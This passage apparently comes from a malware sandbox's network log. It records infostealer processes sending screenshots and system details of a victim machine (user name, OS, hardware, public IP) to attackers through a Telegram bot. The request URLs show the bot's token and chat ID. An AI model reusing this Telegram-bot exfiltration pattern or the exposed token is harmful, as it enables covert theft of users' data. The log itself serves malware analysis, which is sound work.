                                                                  2024-04-19 17:35:17 UTC16355OUTData Raw: e7 92 7f df 22 9c aa aa 30 a0 01 e8 2b 4a 58 19 c6 a2 94 a4 ac 8c eb 66 b4 1d 19 c2 9c 5d e4 ad ad 85 a2 8a 2b d5 3e 78 28 a2 8a 00 b5 a5 b2 a6 a9 6a cc 42 a8 95 49 24 e0 01 9a ee 3e dd 67 ff 00 3f 70 7f df c5 ff 00 1a f3 da 2b 8e be 17 db 4b 9a f6 3d 0c 2e 3b ea f0 70 e5 be bd cf 42 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a 4f b7 d9 7f cf e5 bf fd fd 5f f1 af 3e a2 b0 fe cf fe f7 e1 ff 00 04 e9 fe d5 fe e7 e3 ff 00 00 ea 7c 4f 75 6d 36 9a 89 0d c4 52 37 9a 0e 11 c1 38 c1 f4 ae 56 8a 2b b3 0f 47 d8 c7 96 f7 38 31 58 8f ac 4d 4a d6 d0 28 a2 8a dc e6 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 51 45 14 c0 4a 29 68 a0 04 a2 8a 5a 00 4a 28 a2 80 0a 4a 5a 4a 06 14 51 45 30 0a 28 a2 80 12 8a 5a 4a 06 14 51
                                                                  Data Ascii: "0+JXf]+>x(jBI$>g?p+K=.;pB}[O_>|Oum6R78V+G81XMJ(((JZ((((((QEJ)hZJ(JZJQE0(ZJQ
                                                                  2024-04-19 17:35:17 UTC16355OUTData Raw: d9 f2 82 51 45 14 00 57 49 e0 bf f9 06 dd 7f d7 d3 ff 00 25 ae 6e ba 4f 05 ff 00 c8 36 eb fe be 9f f9 2d 79 79 8f d8 f9 9f 41 92 fc 35 7d 17 e6 6f 4b 22 43 13 cb 23 05 44 05 98 9e c0 57 19 a1 eb 31 5a de de 5e cc 9f ba bb 72 ec 63 52 4c 58 27 01 bb 73 9a d6 d5 34 7b ed 57 50 29 3c 81 6c 43 02 30 e7 ee 80 32 02 fa 93 9e 4e 6b 71 21 8a 38 04 09 1a 88 82 ed 09 8e 31 e9 5e 3b 52 9c ae b4 b1 f4 d0 9d 2a 14 9c 5f bc e5 bd ba 2f f3 ff 00 22 b5 96 a7 6d 7b 2b c3 19 75 95 14 31 49 10 a9 c1 e8 7d c5 73 3e 2a ff 00 91 8a 3f fa f5 1f fa 19 ae ae da c6 d2 d1 99 ad ad a2 85 9b ef 14 40 33 5c a7 8a bf e4 62 8f fe bd 47 fe 86 6b a2 85 fd a4 2f dc e1 c4 f2 7b 1a bc 9b 72 bd fe 46 65 14 51 5f 48 7c 38 51 45 14 00 51 45 14 0c 28 a2 8a 00 28 a2 8a 00 4a 29 68 a0 04 a2 96 8a
                                                                  Data Ascii: QEWI%nO6-yyA5}oK"C#DW1Z^rcRLX's4{WP)<lC02Nkq!81^;R*_/"m{+u1I}s>*?@3\bGk/{rFeQ_H|8QEQE((J)h
                                                                  2024-04-19 17:35:17 UTC15447OUTData Raw: a2 8a 29 80 51 45 14 00 51 45 14 00 94 51 45 03 0a 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 25 14 51 40 05 14 51 40 c2 90 d2 f6 a4 a0 02 8a 28 a0 04 a2 8a 28 18 52 52 d2 50 01 45 14 50 02 51 4b 49 40 c2 8a 28 a0 02 92 8a 29 8c 28 a2 8a 00 4a 28 cd 26 68 18 b4 94 94 50 16 0c fb 52 66 8a 28 18 52 52 d2 50 01 49 4b 49 40 c2 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 a2 8a 06 21 a2 8a 28 00 a4 a5 a4 a0 61 49 4b 49 40 05 25 2d 14 14 25 14 52 50 08 5a 4a 28 a0 04 34 51 45 03 0a 4a 5a 4a 06 14 94 51 40 09 45 2d 25 03 0a 4a 5a 4a 06 14 94 51 40 05 25 2d 14 0c 4a 28 a2 81 85 25 14 94 00 b4 94 51 40 c3 8a 29 28 a0 02 8a 28 a0 62 51 45 14 0c 4a 28 a2 80 0a 28 a4 a6 30 fe 74 51 f9 50 69 0c 43 c7 34 51 45 30 13 f1 a3 8a 28 a0 61 49 c5 2d 27 14 80 3d e8 fa 51 45
                                                                  Data Ascii: )QEQEQEJZJ(QE%Q@Q@((RRPEPQKI@()(J(&hPRf(RRPIKI@(aIERRP0((!(aIKI@%-%RPZJ(4QEJZJQ@E-%JZJQ@%-J(%Q@)((bQEJ((0tQPiC4QE0(aI-'=QE
                                                                  2024-04-19 17:35:17 UTC1569OUTData Raw: 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 09 ff 00 e3 de 4f f7 4f f2 af 9e 6b e8 39 a6 88 c1 20 12 21 25 4f f1 0f 4a f9 f2 ae 26 73 0a dc d3 3c 49 3d 9d 8f d8 2e 6d 60 bf b3 ce e5 86 e1 72 14 fa 83 db f0 ac 3a 2a 88 37 35 3f 12 4f 79 63 f6 0b 6b 58 2c 2c f3 b9 a1 b7 5c 06 3e a4 f7 fc 6b 0e 8a 28 00 a2 8a 29 80 56 bd cf 89 f5 cb 8b a9 67 fe d5 bc 8b cc 72 fe 5c 57
                                                                  Data Ascii: }<B$}<B$}<B$}<B$}<B$}<B$}<BOOk9 !%OJ&s<I=.m`r:*75?OyckX,,\>k()Vgr\W
                                                                  2024-04-19 17:35:17 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 61 34 31 37 32 30 32 32 64 38 32 2d 2d 0d 0a
                                                                  Data Ascii: -----------------------------8dc6a4172022d82--
                                                                  2024-04-19 17:35:17 UTC25INHTTP/1.1 100 Continue
                                                                  2024-04-19 17:35:18 UTC1482INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 19 Apr 2024 17:35:18 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 1093
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                  {"ok":true,"result":{"message_id":3440,"from":{"id":7177134832,"is_bot":true,"first_name":"bng_bot","username":"shanny1975_bot"},"chat":{"id":1210558492,"first_name":"kelv","last_name":"calin","type":"private"},"date":1713548118,"document":{"file_name":"user-618321 2024-05-02 00-47-29.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAg1wZiKrVpTf3MTQCGBG8QSTup8w-SkAArMXAAKLUhlRLkVZjOqtbpsBAAdtAAM0BA","file_unique_id":"AQADsxcAAotSGVFy","file_size":12511,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAg1wZiKrVpTf3MTQCGBG8QSTup8w-SkAArMXAAKLUhlRLkVZjOqtbpsBAAdtAAM0BA","file_unique_id":"AQADsxcAAotSGVFy","file_size":12511,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAINcGYiq1aU39zE0AhgRvEEk7qfMPkpAAKzFwACi1IZUS5FWYzqrW6bNAQ","file_unique_id":"AgADsxcAAotSGVE","file_size":66532},"caption":"New SC Recovered!\n\nTime: 05/02/2024 00:42:29\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 81.181.57.52","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  10192.168.2.549724149.154.167.2204433472C:\Users\user\Desktop\z1E-catalogSamples.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-04-19 17:35:28 UTC262OUTPOST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=---------------------------8dc78741e30d00b
                                                                  Host: api.telegram.org
                                                                  Content-Length: 72005
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  2024-04-19 17:35:28 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 38 37 34 31 65 33 30 64 30 30 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 31 30 35 35 38 34 39 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 38 37 34 31 65 33 30 64 30 30 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 35 2f 32 30 2f 32 30 32 34 20 30 32 3a 32 35 3a 32 33 0a 55 73 65 72
                                                                  Data Ascii: -----------------------------8dc78741e30d00bContent-Disposition: form-data; name="chat_id"1210558492-----------------------------8dc78741e30d00bContent-Disposition: form-data; name="caption"New SC Recovered!Time: 05/20/2024 02:25:23User
                                                                  2024-04-19 17:35:28 UTC16355OUTData Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
                                                                  Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"|
                                                                  2024-04-19 17:35:28 UTC16355OUTData Raw: f9 cf 92 b5 2a 22 a0 c2 8c 0a da 8e 1e 50 9f 3b 77 39 f1 18 b8 d5 a6 a9 c6 36 d8 5a 28 a2 ba ce 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 4a 00 5a 4a 5a 4a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 06 14 51 45 00 14 94 b4 94 00 51 45 14 00 51 45 14 c0 4a 28 a2 81 86 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 40 25 14 51 4c 02 92 96 8a 06 25 14 b4 94 00 51 45 14 00 51 45 14 c0 4a 29 69 28 18 52 d2 51 40 0b b8 d1 95 3d 45 25 14 00 bb 41 e8 69 a5 18 52 e6 97 26 80 19 8a 4a 97 77 a8 cd 26 14 fb 51 61 dc 8e 8a 79 4f 43 9a 69 04 76 34 05 c4 a4 a5 a2 90 c4 a2 8a 29 8c 4a 29 69 28 00 a4 a5 a2 80 12 b6 3c 2b ff 00 21 b4 ff 00 71 bf 95 64 56 c7 85 7f e4 34 9f ee 37 f2 ae 7c 4f f0 64 74 e1 7f 8d 13 b8 a2 8a e4 74 ed 62 f3 51 b8 16 b6 f7 ee f7
                                                                  Data Ascii: *"P;w96Z(((((JZJZJ((((QEQEQEJ(((((@%QL%QEQEJ)i(RQ@=E%AiR&Jw&QayOCiv4)J)i(<+!qdV47|OdttbQ
                                                                  2024-04-19 17:35:28 UTC16355OUTData Raw: 00 76 d6 ce af 6d 1b 23 06 1b 47 22 ae 43 e4 17 dc a1 3c ed b8 27 1f 36 3f 9e 2b 88 b1 bf 9a ca 4c a1 dc 87 ef 21 e8 6a c2 eb 77 69 2b 64 ac b1 16 25 52 51 9c 0f ad 7c fc 72 ca 94 ea 4a da ae 87 d2 2c d6 94 a9 c7 99 59 9d 6d cc 89 1c 52 bb ba a2 86 19 2c 70 07 4a cd bc 96 39 53 52 68 dd 5c 0b 54 04 a9 c8 ce 5c e3 f5 15 9f 3e bb 1c da 6c d1 2c 6f 1c ed 82 37 1d ea 79 1e be c2 a8 0d 5a e8 5a 49 6d 88 84 72 02 18 2c 61 7a fd 31 5b 53 c1 d5 e6 4d f4 65 54 cc a8 28 38 ad 5b 45 0a 28 a2 bd a3 e6 42 8a 28 a0 02 ba 5f 08 fd cb bf aa 7f 5a e6 aa fe 9b aa 4d a6 89 04 29 1b 79 98 ce f0 7b 7d 0f bd 73 62 a9 ca a5 3e 58 ee 76 e0 6a c2 95 5e 69 bb 23 a6 d4 74 6b 7b e9 56 e1 5e 4b 7b a5 e9 34 47 07 f1 f5 aa c7 47 d4 a4 1b 25 d7 66 31 f7 09 10 53 f9 e6 b3 ff 00 e1 27 bc
                                                                  Data Ascii: vm#G"C<'6?+L!jwi+d%RQ|rJ,YmR,pJ9SRh\T\>l,o7yZZImr,az1[SMeT(8[E(B(_ZM)y{}sb>Xvj^i#tk{V^K{4GG%f1S'
                                                                  2024-04-19 17:35:28 UTC15447OUTData Raw: c8 6a 1d 54 13 a6 4c 00 cf 4f e6 2b cc c2 7f bc 43 d5 7e 67 7e 33 fd de a7 a3 fc 8e 66 8a 28 af bd 3e 08 28 a2 8a 00 2a bd ff 00 fc 79 c9 f8 7f 31 56 2a be a1 ff 00 1e 52 7e 1f cc 57 3e 2b f8 13 f4 7f 91 df 95 ff 00 bf 50 ff 00 1c 7f 34 7a 55 64 78 a0 ec d1 25 97 2b 98 99 1c 06 e8 df 30 e2 b5 26 96 38 21 79 a5 60 b1 a0 2c cc 7b 01 5c bd ec f7 1e 24 be 4b 0b 78 cc 16 f0 11 2c af 20 dd cf 60 54 7f 2c fe 58 af 9c ab 2b 46 dd 59 f6 b8 3a 6d d4 55 1e 91 8e ad 9b ba 18 23 44 b2 05 f7 9f 25 79 ce 7b 55 d6 50 ca 55 80 20 8c 10 7b d7 3c 74 5d 4a d2 3d b6 5a 83 32 1d c4 c7 91 18 56 3d c6 01 18 f6 ad bb 15 b9 4b 38 96 f1 d5 ee 02 fc ec 83 82 69 c1 bd 9a 26 bc 23 77 52 32 4e ef e6 79 e5 87 fc 79 c7 f8 ff 00 33 56 2a be 9e 7f d0 a3 fc 7f 99 ab 19 af a1 c2 ff 00 02 1e
                                                                  Data Ascii: jTLO+C~g~3f(>(*y1V*R~W>+P4zUdx%+0&8!y`,{\$Kx, `T,X+FY:mU#D%y{UPU {<t]J=Z2V=K8i&#wR2Nyy3V*
                                                                  2024-04-19 17:35:28 UTC6419OUTData Raw: fa 2b d0 3c 88 7f e7 92 7f df 22 8f 22 1f f9 e4 9f f7 c8 a3 eb ff 00 dd fc 7f e0 07 f6 47 f7 ff 00 0f f8 27 9f d1 5e 81 e4 43 ff 00 3c 93 fe f9 14 79 10 ff 00 cf 24 ff 00 be 45 1f 5f fe ef e3 ff 00 00 3f b2 3f bf f8 7f c1 3c fe 8a f4 0f 22 1f f9 e4 9f f7 c8 a3 c8 87 fe 79 27 fd f2 28 fa ff 00 f7 7f 1f f8 01 fd 93 fd ff 00 c3 fe 09 e7 f4 57 a0 79 10 ff 00 cf 24 ff 00 be 45 1e 44 3f f3 c9 3f ef 91 47 d7 ff 00 bb f8 ff 00 c0 0f ec 8f ef fe 1f f0 4f 3f a2 bd 03 c8 87 fe 79 27 fd f2 28 f2 21 ff 00 9e 49 ff 00 7c 8a 3e bf fd df c7 fe 00 7f 64 ff 00 7f f0 ff 00 82 79 fd 15 e8 1e 44 3f f3 c9 3f ef 91 47 91 0f fc f2 4f fb e4 51 f5 ff 00 ee fe 3f f0 03 fb 27 fb ff 00 87 fc 13 cf a8 af 41 f2 21 ff 00 9e 49 ff 00 7c 8a 3c 88 7f e7 92 7f df 22 8f af ff 00 77 f1 ff 00
                                                                  Data Ascii: +<""G'^C<y$E_??<"y'(Wy$ED??GO?y'(!I|>dyD??GOQ?'A!I|<"w
                                                                  2024-04-19 17:35:28 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 38 37 34 31 65 33 30 64 30 30 62 2d 2d 0d 0a
                                                                  Data Ascii: -----------------------------8dc78741e30d00b--
                                                                  2024-04-19 17:35:28 UTC25INHTTP/1.1 100 Continue
                                                                  2024-04-19 17:35:29 UTC1482INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 19 Apr 2024 17:35:29 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 1093
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                  {"ok":true,"result":{"message_id":3441,"from":{"id":7177134832,"is_bot":true,"first_name":"bng_bot","username":"shanny1975_bot"},"chat":{"id":1210558492,"first_name":"kelv","last_name":"calin","type":"private"},"date":1713548129,"document":{"file_name":"user-618321 2024-05-20 02-25-29.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAg1xZiKrYbZPGJtzfjh9hYIR6GHXiUAAArQXAAKLUhlRs_qaKwfDiiMBAAdtAAM0BA","file_unique_id":"AQADtBcAAotSGVFy","file_size":13289,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAg1xZiKrYbZPGJtzfjh9hYIR6GHXiUAAArQXAAKLUhlRs_qaKwfDiiMBAAdtAAM0BA","file_unique_id":"AQADtBcAAotSGVFy","file_size":13289,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAINcWYiq2G2Txibc344fYWCEehh14lAAAK0FwACi1IZUbP6misHw4ojNAQ","file_unique_id":"AgADtBcAAotSGVE","file_size":71382},"caption":"New SC Recovered!\n\nTime: 05/20/2024 02:25:23\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 81.181.57.52","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  11192.168.2.549725149.154.167.2204437324C:\Users\user\AppData\Roaming\vZkoWbol.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-04-19 17:35:36 UTC238OUTPOST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=---------------------------8dc6ed5c7b45081
                                                                  Host: api.telegram.org
                                                                  Content-Length: 67155
                                                                  Expect: 100-continue
                                                                  2024-04-19 17:35:36 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 65 64 35 63 37 62 34 35 30 38 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 31 30 35 35 38 34 39 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 65 64 35 63 37 62 34 35 30 38 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 35 2f 30 37 2f 32 30 32 34 20 32 30 3a 33 34 3a 32 31 0a 55 73 65 72
                                                                  Data Ascii: -----------------------------8dc6ed5c7b45081Content-Disposition: form-data; name="chat_id"1210558492-----------------------------8dc6ed5c7b45081Content-Disposition: form-data; name="caption"New SC Recovered!Time: 05/07/2024 20:34:21User
                                                                  2024-04-19 17:35:36 UTC16355OUTData Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
                                                                  Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"|
                                                                  2024-04-19 17:35:36 UTC16355OUTData Raw: e7 92 7f df 22 9c aa aa 30 a0 01 e8 2b 4a 58 19 c6 a2 94 a4 ac 8c eb 66 b4 1d 19 c2 9c 5d e4 ad ad 85 a2 8a 2b d5 3e 78 28 a2 8a 00 b5 a5 b2 a6 a9 6a cc 42 a8 95 49 24 e0 01 9a ee 3e dd 67 ff 00 3f 70 7f df c5 ff 00 1a f3 da 2b 8e be 17 db 4b 9a f6 3d 0c 2e 3b ea f0 70 e5 be bd cf 42 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a 4f b7 d9 7f cf e5 bf fd fd 5f f1 af 3e a2 b0 fe cf fe f7 e1 ff 00 04 e9 fe d5 fe e7 e3 ff 00 00 ea 7c 4f 75 6d 36 9a 89 0d c4 52 37 9a 0e 11 c1 38 c1 f4 ae 56 8a 2b b3 0f 47 d8 c7 96 f7 38 31 58 8f ac 4d 4a d6 d0 28 a2 8a dc e6 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 51 45 14 c0 4a 29 68 a0 04 a2 8a 5a 00 4a 28 a2 80 0a 4a 5a 4a 06 14 51 45 30 0a 28 a2 80 12 8a 5a 4a 06 14 51
                                                                  Data Ascii: "0+JXf]+>x(jBI$>g?p+K=.;pB}[O_>|Oum6R78V+G81XMJ(((JZ((((((QEJ)hZJ(JZJQE0(ZJQ
                                                                  2024-04-19 17:35:36 UTC16355OUTData Raw: d9 f2 82 51 45 14 00 57 49 e0 bf f9 06 dd 7f d7 d3 ff 00 25 ae 6e ba 4f 05 ff 00 c8 36 eb fe be 9f f9 2d 79 79 8f d8 f9 9f 41 92 fc 35 7d 17 e6 6f 4b 22 43 13 cb 23 05 44 05 98 9e c0 57 19 a1 eb 31 5a de de 5e cc 9f ba bb 72 ec 63 52 4c 58 27 01 bb 73 9a d6 d5 34 7b ed 57 50 29 3c 81 6c 43 02 30 e7 ee 80 32 02 fa 93 9e 4e 6b 71 21 8a 38 04 09 1a 88 82 ed 09 8e 31 e9 5e 3b 52 9c ae b4 b1 f4 d0 9d 2a 14 9c 5f bc e5 bd ba 2f f3 ff 00 22 b5 96 a7 6d 7b 2b c3 19 75 95 14 31 49 10 a9 c1 e8 7d c5 73 3e 2a ff 00 91 8a 3f fa f5 1f fa 19 ae ae da c6 d2 d1 99 ad ad a2 85 9b ef 14 40 33 5c a7 8a bf e4 62 8f fe bd 47 fe 86 6b a2 85 fd a4 2f dc e1 c4 f2 7b 1a bc 9b 72 bd fe 46 65 14 51 5f 48 7c 38 51 45 14 00 51 45 14 0c 28 a2 8a 00 28 a2 8a 00 4a 29 68 a0 04 a2 96 8a
                                                                  Data Ascii: QEWI%nO6-yyA5}oK"C#DW1Z^rcRLX's4{WP)<lC02Nkq!81^;R*_/"m{+u1I}s>*?@3\bGk/{rFeQ_H|8QEQE((J)h
                                                                  2024-04-19 17:35:36 UTC15447OUTData Raw: a2 8a 29 80 51 45 14 00 51 45 14 00 94 51 45 03 0a 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 25 14 51 40 05 14 51 40 c2 90 d2 f6 a4 a0 02 8a 28 a0 04 a2 8a 28 18 52 52 d2 50 01 45 14 50 02 51 4b 49 40 c2 8a 28 a0 02 92 8a 29 8c 28 a2 8a 00 4a 28 cd 26 68 18 b4 94 94 50 16 0c fb 52 66 8a 28 18 52 52 d2 50 01 49 4b 49 40 c2 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 a2 8a 06 21 a2 8a 28 00 a4 a5 a4 a0 61 49 4b 49 40 05 25 2d 14 14 25 14 52 50 08 5a 4a 28 a0 04 34 51 45 03 0a 4a 5a 4a 06 14 94 51 40 09 45 2d 25 03 0a 4a 5a 4a 06 14 94 51 40 05 25 2d 14 0c 4a 28 a2 81 85 25 14 94 00 b4 94 51 40 c3 8a 29 28 a0 02 8a 28 a0 62 51 45 14 0c 4a 28 a2 80 0a 28 a4 a6 30 fe 74 51 f9 50 69 0c 43 c7 34 51 45 30 13 f1 a3 8a 28 a0 61 49 c5 2d 27 14 80 3d e8 fa 51 45
                                                                  Data Ascii: )QEQEQEJZJ(QE%Q@Q@((RRPEPQKI@()(J(&hPRf(RRPIKI@(aIERRP0((!(aIKI@%-%RPZJ(4QEJZJQ@E-%JZJQ@%-J(%Q@)((bQEJ((0tQPiC4QE0(aI-'=QE
                                                                  2024-04-19 17:35:36 UTC1569OUTData Raw: 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 09 ff 00 e3 de 4f f7 4f f2 af 9e 6b e8 39 a6 88 c1 20 12 21 25 4f f1 0f 4a f9 f2 ae 26 73 0a dc d3 3c 49 3d 9d 8f d8 2e 6d 60 bf b3 ce e5 86 e1 72 14 fa 83 db f0 ac 3a 2a 88 37 35 3f 12 4f 79 63 f6 0b 6b 58 2c 2c f3 b9 a1 b7 5c 06 3e a4 f7 fc 6b 0e 8a 28 00 a2 8a 29 80 56 bd cf 89 f5 cb 8b a9 67 fe d5 bc 8b cc 72 fe 5c 57
                                                                  Data Ascii: }<B$}<B$}<B$}<B$}<B$}<B$}<BOOk9 !%OJ&s<I=.m`r:*75?OyckX,,\>k()Vgr\W
